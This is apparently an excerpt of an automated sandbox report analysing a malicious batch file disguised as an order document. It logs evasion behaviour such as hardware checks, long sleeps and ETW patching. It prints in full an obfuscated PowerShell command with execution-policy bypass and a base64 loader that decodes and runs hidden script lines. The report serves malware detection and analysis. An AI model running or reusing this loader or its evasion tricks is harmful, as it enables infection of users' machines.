gRXJyb3NpZWtscjogQmJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049B42D7 push ebx; ret 4_2_049B42DA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049B2D45 pushad ; ret 4_2_049B2D69
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049B33CD push esp; retf 4_2_049B33D1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0722C710 push esp; ret 4_2_0722CA35
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0722CA38 push C007FFBDh; ret 4_2_0722D01D
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5027Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4635Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep count: 5027 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep count: 4635 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8740Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: powershell.exe, 00000004.00000002.3794299800.0000000008057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxlbWJseXNpZWtsXTo6KCdzaWVrbGRhb0wnc2lla2xbLTEuLnNpZWtsLTRdIC1zaWVrbGpvaW4gc2lla2wnJykoW3NpZWtsYnl0ZVtzaWVrbF1dJHBhc2lla2xyYW1fdnNpZWtsYXIpOwlzaWVrbCRhc2F3c2lla2xmPSRibXNpZWtscWl4LkVzaWVrbG50cnlQc2lla2xvaW50O3NpZWtsCSRhc2FzaWVrbH
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: Yara matchFile source: amsi32_8644.amsi.csv, type: OTHER
                            Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                            Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                            Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgI